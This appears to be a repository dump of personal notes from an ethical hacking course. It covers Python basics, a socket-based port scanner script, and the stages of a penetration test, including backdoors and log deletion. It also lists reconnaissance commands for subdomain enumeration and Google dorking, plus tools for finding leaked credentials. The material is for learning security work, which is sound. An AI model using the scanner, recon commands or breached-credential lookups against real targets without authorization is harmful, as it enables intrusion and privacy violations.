"The Perks of Being a Wallflower", "The Exorcist"] 53 | 54 | print(movies[1]) # Returns the second item in the list - index / indices 55 | print(movies[0]) # Returns the first item in the list 56 | print(movies[1:3]) # Returns the first number given until right before the last number given 57 | print(movies[1:4]) # Returns all 58 | print(movies[1:]) # Returns everything from the number to the end of the list 59 | print(movies[:1]) # Everything before 1 60 | print(movies[:2]) 61 | print(movies[-1]) # Grabs the last item 62 | 63 | print(len(movies)) # Counts items in the list 64 | movies.append("JAWS") 65 | print(movies) # Appends to the end of the list 66 | 67 | movies.insert(2, "Hustle") 68 | print(movies) 69 | 70 | movies.pop() # Removes the last item 71 | print(movies) 72 | 73 | movies.pop(0) # Removes the first item 74 | print(movies) 75 | 76 | amber_movies = ['Just Go With It', '50 First Dates'] 77 | our_favorite_movies = movies + amber_movies 78 | print(our_favorite_movies) 79 | 80 | grades = [["Bob", 82], ["Alice", 90], ["Jeff", 73]] 81 | bobs_grade = grades[0][1] 82 | print(bobs_grade) 83 | grades[0][1] = 83 84 | print(bobs_grade) 85 | ``` -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/05. Introduction to Python/09. Tuples.md: -------------------------------------------------------------------------------- 1 | # Tuples 2 | > 17.11.2023 3 | --- 4 | 5 | In Python, a tuple is an ordered collection of elements, similar to a list. However, unlike lists, tuples are immutable, meaning their elements cannot be modified once they are created: 6 | 7 | **Tuple Creation:** 8 | - To make a tuple, enclose comma-separated values within parentheses ( ). 9 | 10 | ```python 11 | fruits = ("apple", "banana", "orange") 12 | ``` 13 | 14 | **Tuple Access:** 15 | - Retrieve individual elements using indexing, starting from 0. 16 | 17 | ```python 18 | print(fruits[0]) # Output: "apple" 19 | print(fruits[2]) # Output: "orange" 20 | ``` 21 | 22 | **Tuple Immutability:** 23 | - Tuples are immutable; you can't change their elements after creation. 24 | 25 | ```python 26 | fruits[1] = "grape" # This will raise an error 27 | ``` 28 | 29 | **Tuple Operations:** 30 | - Though immutable, you can still perform certain operations like concatenation and length retrieval. 31 | 32 | ```python 33 | fruits = ("apple", "banana", "orange") 34 | fruits2 = ("grape", "kiwi") 35 | 36 | combined = fruits + fruits2 37 | print(combined) # Output: ("apple", "banana", "orange", "grape", "kiwi") 38 | 39 | print(len(fruits)) # Output: 3 40 | 41 | subtuple = fruits[1:3] 42 | print(subtuple) # Output: ("banana", "orange") 43 | ``` 44 | 45 | ```python 46 | # Tuples - Do not change, () 47 | grades = ("a", "b", "c", "d", "f") 48 | 49 | # grades.pop, grades.append won't work - not mutable 50 | 51 | print(grades[1]) 52 | ``` -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/05. Introduction to Python/10. Looping.md: -------------------------------------------------------------------------------- 1 | # Looping 2 | > 17.11.2023 3 | --- 4 | 5 | 6 | **for Loop:** 7 | - Iterates over a sequence (list, tuple, string, or range). 8 | - Executes a block of code for each item in the sequence. 9 | 10 | ```python 11 | fruits = ["apple", "banana", "orange"] 12 | for fruit in fruits: 13 | print(fruit) 14 | ``` 15 | 16 | Output: 17 | ``` 18 | apple 19 | banana 20 | orange 21 | ``` 22 | 23 | **while Loop:** 24 | - Repeatedly executes a block of code while a condition is true. 25 | - Continues until the condition becomes false. 26 | 27 | ```python 28 | count = 0 29 | while count < 5: 30 | print(count) 31 | count += 1 32 | ``` 33 | 34 | Output: 35 | ``` 36 | 0 37 | 1 38 | 2 39 | 3 40 | 4 41 | ``` 42 | 43 | **break and continue Statements:** 44 | - `break` exits the loop prematurely. 45 | - `continue` skips the current iteration and moves to the next. 46 | 47 | ```python 48 | # For loops - start to finish of an iterate 49 | vegetables = ["cucumber", "spinach", "cabbage"] 50 | for x in vegetables: 51 | print(x) 52 | 53 | # While loops - execute as long as true 54 | i = 1 55 | while i < 10: 56 | print(i) 57 | i += 1 58 | ``` -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/05. Introduction to Python/11. Advanced Strings.md: -------------------------------------------------------------------------------- 1 | # Advanced Strings 2 | > 17.11.2023 3 | --- 4 | 5 | A string (str) represents a sequence of characters enclosed in single (' ') or double (" ") quotes. Strings are immutable: 6 | 7 | **Creation:** 8 | ```python 9 | my_string = 'Hello, World!' # or my_string = "Hello, World!" 10 | ``` 11 | 12 | **Accessing Characters:** 13 | - Indexing starts from 0. 14 | ```python 15 | print(my_string[0]) # Outputs 'H' 16 | ``` 17 | 18 | **String Concatenation:** 19 | - Use + to join strings. 20 | ```python 21 | greeting = 'Hello' + ' ' + 'World!' # Results in 'Hello World!' 22 | ``` 23 | 24 | **String Length:** 25 | - `len()` function determines the string length. 26 | ```python 27 | print(len(my_string)) # Outputs length of the string. 28 | ``` 29 | 30 | **String Slicing:** 31 | - Extract substring using slicing. 32 | ```python 33 | substring = my_string[7:12] # Extracts 'World' 34 | ``` 35 | 36 | **String Methods:** 37 | - Built-in methods like `upper()`, `lower()`, `strip()`, `split()`, `replace()`. 38 | ```python 39 | print(my_string.upper()) # Outputs 'HELLO, WORLD!' 40 | ``` 41 | 42 | **String Formatting:** 43 | - Embed values within a string. 44 | ```python 45 | name = 'Alice' 46 | age = 30 47 | print("My name is %s and I'm %d years old." % (name, age)) 48 | # Output: My name is Alice and I'm 30 years old. 49 | ``` 50 | 51 | **Advanced String Operations:** 52 | ```python 53 | my_name = "Heath" 54 | print(my_name[0]) # Outputs 'H' 55 | print(my_name[-1]) # Outputs the last letter 56 | 57 | sentence = "This is a sentence." 58 | print(sentence[:4]) # Outputs 'This' 59 | 60 | print(sentence.split()) # Splits on space 61 | sentence_split = sentence.split() 62 | sentence_join = ' '.join(sentence_split) # Joins with space 63 | print(sentence_join) 64 | 65 | quote = "He said, \"give me all your money\"" 66 | print(quote) 67 | 68 | too_much_space = " hello " 69 | print(too_much_space.strip()) 70 | 71 | print("A" in "Apple") # Returns True 72 | print("a" in "Apple") # Returns False (case-sensitive) 73 | 74 | letter = "A" 75 | word = "Apple" 76 | print(letter.lower() in word.lower()) # Case-insensitive check 77 | 78 | movie = "The Hangover" 79 | print("My favorite movie is {}.".format(movie)) 80 | print("My favorite movie is %s" % movie) 81 | print(f"My favorite movie is {movie}") 82 | ``` 83 | -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/05. Introduction to Python/12. Dictionaries.md: -------------------------------------------------------------------------------- 1 | # Dictionaries 2 | > 19.11.2023 3 | --- 4 | 5 | A dictionary stores key-value pairs. It allows one to organize and manipulate data efficiently: 6 | 7 | **Dictionary Creation:** 8 | ```python 9 | student = { 10 | "name": "Alice", 11 | "age": 20, 12 | "major": "Computer Science" 13 | } 14 | ``` 15 | 16 | **Dictionary Access:** 17 | - Access values using keys. 18 | ```python 19 | print(student["name"]) # Outputs "Alice" 20 | print(student["age"]) # Outputs 20 21 | ``` 22 | 23 | **Dictionary Modification:** 24 | - Mutable; modify values by assigning new values to keys. 25 | ```python 26 | student["age"] = 21 # Modifying a value 27 | student["city"] = "London" # Adding a new key-value pair 28 | ``` 29 | 30 | **Dictionary Operations:** 31 | - Length: `len()` returns the number of key-value pairs. 32 | - Iteration: Loop through keys, values, or key-value pairs. 33 | - Deletion: Use `del` to remove a key-value pair. 34 | ```python 35 | print(len(student)) # Outputs 3 36 | 37 | for key in student: 38 | print(key, student[key]) # Outputs "name Alice", "age 20", "major Computer Science" 39 | 40 | del student["age"] # Deleting a key-value pair 41 | ``` 42 | 43 | **Advanced Dictionary Operations:** 44 | ```python 45 | drinks = {"White Russian": 7, "Old Fashion": 10, "Lemon Drop": 8} 46 | print(drinks) 47 | 48 | employees = {"Finance": ["Bob", "Linda", "Tina"], "IT": ["Gene", "Louise", "Teddy"], "HR": ["Jimmy Jr.", "Mort"]} 49 | employees['Legal'] = ["Mr. Frond"] 50 | print(employees) 51 | 52 | employees.update({"Sales": ["Andie", "Ollie"]}) 53 | print(employees) 54 | 55 | drinks['White Russian'] = 8 56 | print(drinks) 57 | 58 | print(drinks.get("White Russian")) 59 | ``` 60 | -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/05. Introduction to Python/13. Importing Modules.md: -------------------------------------------------------------------------------- 1 | # Importing Modules 2 | > 19.11.2023 3 | --- 4 | 5 | **Importing Entire Modules:** 6 | ```python 7 | import math 8 | 9 | result = math.sqrt(25) 10 | print(result) # Outputs 5.0 11 | ``` 12 | 13 | **Importing Specific Functions or Variables:** 14 | ```python 15 | from math import sqrt 16 | 17 | result = sqrt(25) 18 | print(result) # Outputs 5.0 19 | ``` 20 | 21 | **Importing Modules with an Alias:** 22 | ```python 23 | import math as m 24 | 25 | result = m.sqrt(25) 26 | print(result) # Outputs 5.0 27 | ``` 28 | 29 | **Importing All Functions and Variables:** 30 | ```python 31 | from math import * 32 | 33 | result = sqrt(25) 34 | print(result) # Outputs 5.0 35 | ``` 36 | 37 | **Advanced Importing:** 38 | ```python 39 | import sys # System functions and parameters 40 | from datetime import datetime as dt # Import with alias 41 | 42 | print(sys.version) 43 | print(dt.now()) 44 | ``` 45 | -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/05. Introduction to Python/14. Sockets.md: -------------------------------------------------------------------------------- 1 | # Sockets 2 | > 19.11.2023 3 | --- 4 | 5 | Sockets are essential for networking, enabling communication between computers over a network: 6 | 7 | **Socket Creation:** 8 | ```python 9 | import socket 10 | 11 | # Create a TCP socket 12 | tcp_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 13 | 14 | # Create a UDP socket 15 | udp_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) 16 | ``` 17 | 18 | **Socket Communication:** 19 | Methods for connection, data sending, and receiving: 20 | ```python 21 | socket.connect(address) # Establishes a connection to a remote address. 22 | socket.bind(address) # Binds the socket to a specific address and port. 23 | socket.listen(backlog) # Listens for incoming connections on a TCP socket. 24 | socket.accept() # Accepts an incoming connection and returns a new socket object for communication. 25 | socket.send(data) # Sends data over the socket. 26 | socket.recv(buffer_size) # Receives data from the socket. 27 | ``` 28 | 29 | **TCP Server Example:** 30 | ```python 31 | import socket 32 | 33 | # Create a TCP socket 34 | server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 35 | 36 | # Bind the socket to a specific address and port 37 | server_address = ('localhost', 1234) 38 | server_socket.bind(server_address) 39 | 40 | # Listen for incoming connections 41 | server_socket.listen(5) 42 | 43 | while True: 44 | # Accept a client connection 45 | client_socket, client_address = server_socket.accept() 46 | 47 | # Receive and send data 48 | data = client_socket.recv(1024) 49 | client_socket.send(b"Received: " + data) 50 | 51 | # Close the client socket 52 | client_socket.close() 53 | ``` 54 | 55 | Socket programming in Python facilitates the creation of client-server and networked applications, offering flexibility in communication over networks using protocols like TCP and UDP. The socket module provides extensive functionality for efficient network communication. 56 | 57 | ```python 58 | #SOCKETS - Sockets can be used to connect two nodes together. 59 | 60 | #!/bin/python3 61 | import socket 62 | HOST = '127.0.0.1' 63 | PORT = 7777 64 | 65 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #af_inet is ipv4, sock stream is a port s.connect((HOST,PORT)) 66 | s.connect((HOST,PORT)) 67 | ``` -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/05. Introduction to Python/15. Building a Port Scanner.md: -------------------------------------------------------------------------------- 1 | # Building a Port Scanner 2 | > 19.11.2023 3 | --- 4 | 5 | 1. **Importing Modules:** 6 | - `sys`: Provides access to some variables used or maintained by the Python interpreter and to functions that interact with the interpreter. 7 | - `socket`: Provides low-level networking interfaces. 8 | - `datetime`: A module to work with dates and times. 9 | 10 | ```python 11 | import sys 12 | import socket 13 | from datetime import datetime 14 | ``` 15 | 16 | 2. **Define Target:** 17 | - The script checks if the correct number of command-line arguments is provided. If yes, it retrieves the target IP address using `socket.gethostbyname()`. 18 | 19 | ```python 20 | if len(sys.argv) == 2: 21 | target = socket.gethostbyname(sys.argv[1]) 22 | else: 23 | print("Invalid amount of arguments.") 24 | print("Syntax: python3 scanner.py") 25 | ``` 26 | 27 | 3. **Print Banner:** 28 | - A banner is printed to the console, indicating the start of the scan along with the target and the current time. 29 | 30 | ```python 31 | print("-" * 50) 32 | print("Scanning target " + target) 33 | print("Time started: " + str(datetime.now())) 34 | print("-" * 50) 35 | ``` 36 | 37 | 4. **Port Scanning:** 38 | - The script then attempts to connect to each port in the specified range (50 to 85) using a `for` loop. 39 | - `socket.socket()`: Creates a new socket object. 40 | - `socket.setdefaulttimeout(1)`: Sets a default timeout for the socket operations to 1 second. 41 | - `s.connect_ex((target, port))`: Attempts to connect to the target on the specified port. Returns 0 if successful (port open) and 1 if unsuccessful (port closed). 42 | 43 | ```python 44 | try: 45 | for port in range(50, 85): 46 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 47 | socket.setdefaulttimeout(1) 48 | result = s.connect_ex((target, port)) 49 | if result == 0: 50 | print("Port {} is open".format(port)) 51 | s.close() 52 | 53 | except KeyboardInterrupt: 54 | print("\nExiting program.") 55 | sys.exit() 56 | 57 | except socket.gaierror: 58 | print("Hostname could not be resolved.") 59 | sys.exit() 60 | 61 | except socket.error: 62 | print("Could not connect to server.") 63 | sys.exit() 64 | ``` 65 | 66 | The script handles keyboard interrupts and socket-related exceptions, ensuring graceful exits and informative messages. It prints whether each scanned port is open or closed. 67 | 68 | ```python 69 | #!/bin/python3 70 | 71 | import sys 72 | import socket 73 | from datetime import datetime 74 | 75 | # Define our target 76 | if len(sys.argv) == 2: 77 | target = socket.gethostbyname(sys.argv[1]) # Translate hostname to IPv4 78 | else: 79 | print("Invalid amount of arguments.") 80 | print("Syntax: python3 scanner.py") 81 | 82 | # Add a pretty banner 83 | print("-" * 50) 84 | print("Scanning target " + target) 85 | print("Time started: " + str(datetime.now())) 86 | print("-" * 50) 87 | 88 | try: 89 | for port in range(50, 85): 90 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 91 | socket.setdefaulttimeout(1) 92 | result = s.connect_ex((target, port)) # returns an error indicator - if port is open it throws a 0, otherwise 1 93 | if result == 0: 94 | print("Port {} is open".format(port)) 95 | s.close() 96 | 97 | except KeyboardInterrupt: 98 | print("\nExiting program.") 99 | sys.exit() 100 | 101 | except socket.gaierror: 102 | print("Hostname could not be resolved.") 103 | sys.exit() 104 | 105 | except socket.error: 106 | print("Could not connect to server.") 107 | sys.exit() 108 | ``` -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/05. Introduction to Python/16. User Input.md: -------------------------------------------------------------------------------- 1 | #  User Input 2 | > 20.11.2023 3 | --- 4 | 5 | ```python 6 | # USER INPUT 7 | 8 | # Example 1: Greeting the user by taking their name as input 9 | name = input("Enter your name: ") 10 | print("Hello, " + name + "!") 11 | 12 | # Example 2: Getting and manipulating the user's age 13 | age = input("Enter your age: ") 14 | age = int(age) # Convert input to an integer 15 | print("You will be " + str(age + 1) + " next year.") 16 | 17 | # Example 3: Performing a calculation based on user input for numbers and an operator 18 | x = float(input("Give me a number: ")) 19 | o = input("Give me an operator: ") 20 | y = float(input("Give me yet another number: ")) 21 | 22 | # Handling different operators and printing the result 23 | if o == "+": 24 | print(x + y) 25 | elif o == "-": 26 | print(x - y) 27 | elif o == "/": 28 | print(x / y) 29 | elif o == "*": 30 | print(x * y) 31 | elif o == "**": 32 | print(x ** y) 33 | else: 34 | print("Unknown operator.") 35 | ``` 36 | 37 | This Python code showcases user input examples, including taking the user's name, age, and performing calculations based on numeric input and operators. -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/05. Introduction to Python/17. Reading and Writing Files.md: -------------------------------------------------------------------------------- 1 | # Reading and Writing Files 2 | > 20.11.2023 3 | --- 4 | 5 | **Reading Files:** 6 | - Open a file in read mode with `open("example.txt", "r")`. 7 | - Use methods like `read()`, `readline()`, or `readlines()` to get file contents. 8 | - `read()`: Retrieves the entire file content as a string. 9 | - `readline()`: Gets a single line from the file. 10 | - `readlines()`: Gets all lines as a list. 11 | 12 | **Example:** 13 | ```python 14 | with open("example.txt", "r") as file: 15 | content = file.read() 16 | line = file.readline() 17 | lines = file.readlines() 18 | ``` 19 | 20 | **Writing Files:** 21 | - Open a file in write mode with `open("example.txt", "w")`. 22 | - Use the `write()` method to add content to the file. 23 | 24 | **Example:** 25 | ```python 26 | with open("example.txt", "w") as file: 27 | file.write("Hello, World!\n") 28 | file.write("This is a new line.") 29 | ``` 30 | 31 | **Appending to Files:** 32 | - Open a file in append mode with `open("example.txt", "a")`. 33 | - Use `write()` to add content without overwriting existing content. 34 | 35 | Example: 36 | ```python 37 | with open("example.txt", "a") as file: 38 | file.write("\nThis is appended content.") 39 | ``` 40 | 41 | Reading and writing files in Python is crucial for managing external data and storing program outputs. Always close files to prevent memory leaks and maintain data integrity. -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/05. Introduction to Python/18. Classes and Objects.md: -------------------------------------------------------------------------------- 1 | # Classes and Objects 2 | > 20.11.2023 3 | --- 4 | 5 | **Classes and Objects in Python:** 6 | In Python, classes and objects are fundamental to object-oriented programming (OOP), providing a structure for code and defining custom data types. 7 | 8 | **Classes:** 9 | - A *class* is a blueprint or template for creating objects, defining their properties (attributes), and behaviors (methods). 10 | 11 | Example: 12 | ```python 13 | class Dog: 14 | def __init__(self, name, age): 15 | self.name = name 16 | self.age = age 17 | 18 | def bark(self): 19 | print("Woof!") 20 | 21 | def display_info(self): 22 | print("Name:", self.name) 23 | print("Age:", self.age) 24 | ``` 25 | 26 | **Objects:** 27 | - An object is an instance of a class, created based on the class blueprint. 28 | - Each object has its own set of attributes and can invoke methods defined in the class. 29 | 30 | **Example:** 31 | ```python 32 | dog1 = Dog("Buddy", 5) 33 | dog2 = Dog("Max", 3) 34 | 35 | dog1.bark() # Output: "Woof!" 36 | dog1.display_info() # Output: "Name: Buddy", "Age: 5" 37 | 38 | dog2.bark() # Output: "Woof!" 39 | dog2.display_info() # Output: "Name: Max", "Age: 3" 40 | ``` 41 | 42 | **Employees Class Example:** 43 | ```python 44 | class Employees: 45 | def __init__(self, name, department, role, salary, years_employed): 46 | self.name = name 47 | self.department = department 48 | self.role = role 49 | self.salary = salary 50 | self.years_employed = years_employed 51 | 52 | def eligible_for_retirement(self): 53 | return self.years_employed >= 20 54 | 55 | # Example usage: 56 | e1 = Employees("Bob", "Sales", "Director of Sales", 100000, 20) 57 | e2 = Employees("Linda", "Executive", "CIO", 150000, 10) 58 | 59 | print(e1.name) 60 | print(e2.role) 61 | print(e1.eligible_for_retirement()) 62 | ``` 63 | 64 | These examples showcase how classes and objects are pivotal in OOP, facilitating code organization, data encapsulation, and the creation of reusable entities. They enable the modeling of real-world entities, the definition of custom data types, and the construction of complex systems using principles like inheritance, polymorphism, and encapsulation. -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/05. Introduction to Python/19. Building a Shoe Budget Tool.md: -------------------------------------------------------------------------------- 1 | # Building a Shoe Budget Tool 2 | > 20.11.2023 3 | --- 4 | 5 | ```python 6 | # Defining a Shoes class for budgeting and purchasing shoes 7 | class Shoes: 8 | # Constructor to initialize object properties (name and price) 9 | def __init__(self, name, price): 10 | self.name = name 11 | # Convert the price to a float for consistency 12 | self.price = float(price) 13 | 14 | # Method to check if the budget is a valid number 15 | def budget_check(self, budget): 16 | # Check if the budget is not an instance of int or float 17 | if not isinstance(budget, (int, float)): 18 | # Print an error message and exit the program 19 | print('Invalid entry. Please enter a number.') 20 | exit() 21 | 22 | # Method to calculate the change after a purchase 23 | def change(self, budget): 24 | return budget - self.price 25 | 26 | # Method to simulate the process of buying shoes 27 | def buy(self, budget): 28 | # Check if the budget is a valid number 29 | self.budget_check(budget) 30 | 31 | # Check if the budget is enough to buy the shoes 32 | if budget >= self.price: 33 | # Print a message indicating the purchase 34 | print(f'You can buy some {self.name}') 35 | 36 | # Check if the budget exactly matches the price 37 | if budget == self.price: 38 | print('You have exactly enough money for these shoes.') 39 | else: 40 | # Print the change after the purchase 41 | print(f'You can buy these shoes and have ${self.change(budget)} left over') 42 | 43 | # Exit the program with a thank-you message 44 | exit('Thanks for using our shoe budget app!') 45 | 46 | # Importing the Shoes class for use 47 | from Shoes import Shoes 48 | 49 | # Creating instances of the Shoes class with different shoes and prices 50 | low = Shoes('And 1s', 30) 51 | medium = Shoes('Air Force 1s', 120) 52 | high = Shoes('Off Whites', 400) 53 | 54 | try: 55 | # Getting the user's shoe budget as a floating-point number 56 | shoe_budget = float(input('What is your shoe budget? ')) 57 | except ValueError: 58 | # Exit the program if the user enters a non-number 59 | exit('Please enter a number') 60 | 61 | # Iterating through each shoe and simulating the purchase 62 | for shoes in [high, medium, low]: 63 | shoes.buy(shoe_budget) 64 | ``` 65 | 66 | ```python 67 | # Opening a file named 'months.txt' for reading 68 | months = open('months.txt') 69 | 70 | # Printing information about the file 71 | print(months) 72 | print(months.mode) 73 | print(months.readable()) 74 | 75 | # Closing the file 76 | months.close() 77 | 78 | # Attempting to read from the closed file (will result in an error) 79 | print(months.read()) 80 | 81 | # Reading a single line from the file 82 | print(months.readline()) 83 | 84 | # Reading the next line from the file 85 | print(months.readline()) 86 | 87 | # Reading all remaining lines and printing them as an array 88 | print(months.readlines()) 89 | 90 | # Attempting to read more lines (will print an empty array) 91 | print(months.readlines()) 92 | 93 | # Setting the file cursor back to the beginning 94 | months.seek(0) 95 | 96 | # Reading all lines again and printing them as an array 97 | print(months.readlines()) 98 | 99 | # Setting the file cursor back to the beginning 100 | months.seek(0) 101 | 102 | # Iterating through each line in the file and printing it 103 | for month in months: 104 | print(month) 105 | 106 | # Setting the file cursor back to the beginning 107 | months.seek(0) 108 | 109 | # Iterating through each line, stripping whitespace, and printing it 110 | for month in months: 111 | print(month.strip()) 112 | 113 | # Opening a file named 'days.txt' for writing 114 | days = open("days.txt", "w") 115 | 116 | # Writing the string "Monday" to the file 117 | days.write("Monday") 118 | 119 | # Closing the file 120 | days.close() 121 | 122 | # Opening the same file for writing again (overwriting the existing content) 123 | days = open("days.txt", "w") 124 | 125 | # Writing the string "\nTuesday" to the file (overwrites the existing content) 126 | days.write("\nTuesday") 127 | 128 | # Closing the file 129 | days.close() 130 | 131 | # Opening the file in append mode 132 | days = open("days.txt", "a") 133 | 134 | # Writing the string "\nWednesday" to the file (appending to the existing content) 135 | days.write("\nWednesday") 136 | 137 | # Closing the file 138 | days.close() 139 | ``` -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/06. The Ethical Hacker Methodology/00. Image/The Five Stages of Ethical Hacking 01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/MrMidnight7331/PJPT-Notes/06491b77f23cfb4dfce939eef5fc8e36f57645fd/Practical Ethical Hacking - The Complete Course/06. The Ethical Hacker Methodology/00. Image/The Five Stages of Ethical Hacking 01.png -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/06. The Ethical Hacker Methodology/01. The Five Stages of Ethical Hacking.md: -------------------------------------------------------------------------------- 1 | # The Five Stages of Ethical Hacking 2 | > 14.11.2023 3 | --- 4 | 5 | ![[The Five Stages of Ethical Hacking 01.png]] 6 | 7 | 1. **Reconnaissance:** 8 | - *What?* Gathering info about the target system or network. 9 | - *How?* Passive techniques like checking public info, browsing websites, and looking at DNS records. 10 | - *Why?* To understand the target and spot potential entry points. 11 | 12 | 2. **Scanning:** 13 | - *What?* Actively probing the target to find open ports, services, and vulnerabilities. 14 | - *How?* Using tools for port scanning, network mapping, and vulnerability scanning. 15 | - *Why?* Identifying weaknesses that could be exploited. 16 | 17 | 3. **Gaining Access:** 18 | - *What?* Trying to get unauthorized access to the target. 19 | - *How?* Exploiting vulnerabilities found earlier, using techniques like password cracking or social engineering. 20 | - *Why?* To simulate a real attack and assess potential risks. 21 | 22 | 4. **Maintaining Access:** 23 | - *What?* After gaining access, the focus is on keeping it. 24 | - *How?* Bypassing security, setting up backdoors, and maintaining persistent access. 25 | - *Why?* Mimicking a real attacker's actions to understand the impact. 26 | 27 | 5. **Covering Tracks:** 28 | - *What?* Removing any signs of the ethical hacking activity. 29 | - *How?* Deleting logs, modifying or removing files, and restoring the system to its original state. 30 | - *Why?* Ensuring the ethical hacking goes undetected, leaving no evidence. -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/07. Information Gathering (Reconnaissance)/00. image/Passive Reconnaissance Overview 01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/MrMidnight7331/PJPT-Notes/06491b77f23cfb4dfce939eef5fc8e36f57645fd/Practical Ethical Hacking - The Complete Course/07. Information Gathering (Reconnaissance)/00. image/Passive Reconnaissance Overview 01.png -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/07. Information Gathering (Reconnaissance)/00. image/Passive Reconnaissance Overview 02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/MrMidnight7331/PJPT-Notes/06491b77f23cfb4dfce939eef5fc8e36f57645fd/Practical Ethical Hacking - The Complete Course/07. Information Gathering (Reconnaissance)/00. image/Passive Reconnaissance Overview 02.png -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/07. Information Gathering (Reconnaissance)/01. Passive Reconnaissance Overview.md: -------------------------------------------------------------------------------- 1 | # Passive Reconnaissance Overview 2 | > 14.11.2023 3 | --- 4 | 5 | ![[Passive Reconnaissance Overview 01.png]] 6 | 7 | ![[Passive Reconnaissance Overview 02.png]] -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/07. Information Gathering (Reconnaissance)/02. Gathering Email and Breached Credentials.md: -------------------------------------------------------------------------------- 1 | # Gathering Email and Breached Credentials 2 | > 03.12.2023 3 | --- 4 | 5 | **Discovering Email Addresses:** 6 | [Hunter](https://hunter.io) 7 | [Phonebook](https://phonebook.cz) 8 | [Voilanrobert](https://www.voilanorbert.com) 9 | [EmailHippo](https://tools.verifyemailaddress.io) 10 | [Email Checker](https://email-checker.net/validate) 11 | 12 | **Gathering Breached Credentials with Breach-Parse & DeHashed:** 13 | [Breach Parse](https://github.com/hmaverickadams/breach-parse) 14 | [DeHashed](https://dehashed.com) 15 | -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/07. Information Gathering (Reconnaissance)/03. Hunting Subdomains Part 1, 2.md: -------------------------------------------------------------------------------- 1 | # Hunting Subdomains Part 1, 2 2 | > 07.12.2023 3 | --- 4 | 5 | - Sublist3r: 6 | ```bash 7 | sublist3r -d domain.com -t 1337 8 | ``` 9 | 10 | - FFUF: 11 | ```bash 12 | ffuf -w ~/wordlists/subdomains.txt -H "Host: FUZZ.domain.com" -u http://domain.com -fs 1337 13 | ``` 14 | 15 | - Gobuster: 16 | ```bash 17 | gobuster vhost -u domain.com -w wordlist.txt 18 | ``` 19 | 20 | - https://crt.sh -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/07. Information Gathering (Reconnaissance)/04. Identifying Website Technologies.md: -------------------------------------------------------------------------------- 1 | # Identifying Website Technologies 2 | > 07.12.2023 3 | --- 4 | 5 | - [BuildWith](https://builtwith.com) 6 | - [Wappalyzer](https://www.wappalyzer.com/apps/) 7 | 8 | - Whatweb: 9 | ```bash 10 | whatweb https://domain.com 11 | ``` -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/07. Information Gathering (Reconnaissance)/05. Google Fu.md: -------------------------------------------------------------------------------- 1 | # Google Fu 2 | > 07.12.2023 3 | --- 4 | 5 | **Google Dorking CheatSheet:** 6 | 7 | |Filter|Description|Example| 8 | |:--|:--|:--| 9 | |allintext|Searches for occurrences of all the keywords given.|`allintext:"keyword"`| 10 | |intext|Searches for the occurrences of keywords all at once or one at a time.|`intext:"keyword"`| 11 | |inurl|Searches for a URL matching one of the keywords.|`inurl:"keyword"`| 12 | |allinurl|Searches for a URL matching all the keywords in the query.|`allinurl:"keyword"`| 13 | |intitle|Searches for occurrences of keywords in title all or one.|`intitle:"keyword"`| 14 | |allintitle|Searches for occurrences of keywords all at a time.|`allintitle:"keyword"`| 15 | |site|Specifically searches that particular site and lists all the results for that site.|`site:"www.google.com"`| 16 | |filetype|Searches for a particular filetype mentioned in the query.|`filetype:"pdf"`| 17 | |link|Searches for external links to pages.|`link:"keyword"`| 18 | |numrange|Used to locate specific numbers in your searches.|`numrange:321-325`| 19 | |before/after|Used to search within a particular date range.|`filetype:pdf & (before:2000-01-01 after:2001-01-01)`| 20 | |allinanchor (and also inanchor)|This shows sites which have the keyterms in links pointing to them, in order of the most links.|`inanchor:rat`| 21 | |allinpostauthor (and also inpostauthor)|Exclusive to blog search, this one picks out blog posts that are written by specific individuals.|`allinpostauthor:"keyword"`| 22 | |related|List web pages that are “similar” to a specified web page.|`related:www.google.com`| 23 | |cache|Shows the version of the web page that Google has in its cache.|`cache:www.google.com`| 24 | 25 | **Search Term:** 26 | This operator searches for the exact phrase within speech marks only. This is ideal when the phrase you are using to search is ambiguous and could be easily confused with something else, or when you’re not quite getting relevant enough results back. For example: 27 | 28 | ``` 29 | "Tinned Sandwiches" 30 | ``` 31 | 32 | **OR:** 33 | This self explanatory operator searches for a given search term OR an equivalent term. 34 | 35 | ``` 36 | site:facebook.com | site:twitter.com 37 | ``` 38 | 39 | **AND:** 40 | ``` 41 | site:facebook.com & site:twitter.com 42 | ``` 43 | 44 | **Operators combinaison:** 45 | ``` 46 | (site:facebook.com | site:twitter.com) & intext:"login" 47 | (site:facebook.com | site:twitter.com) (intext:"login") 48 | ``` 49 | 50 | **Include results:** 51 | This will order results by the number of occurrence of the keyword. 52 | 53 | ``` 54 | -site:facebook.com +site:facebook.* 55 | ``` 56 | 57 | **Exclude results:** 58 | ``` 59 | site:facebook.* -site:facebook.com 60 | ``` 61 | 62 | **Synonyms:** 63 | Adding a tilde to a search word tells Google that you want it to bring back synonyms for the term as well. For example, entering “~set” will bring back results that include words like “configure”, “collection” 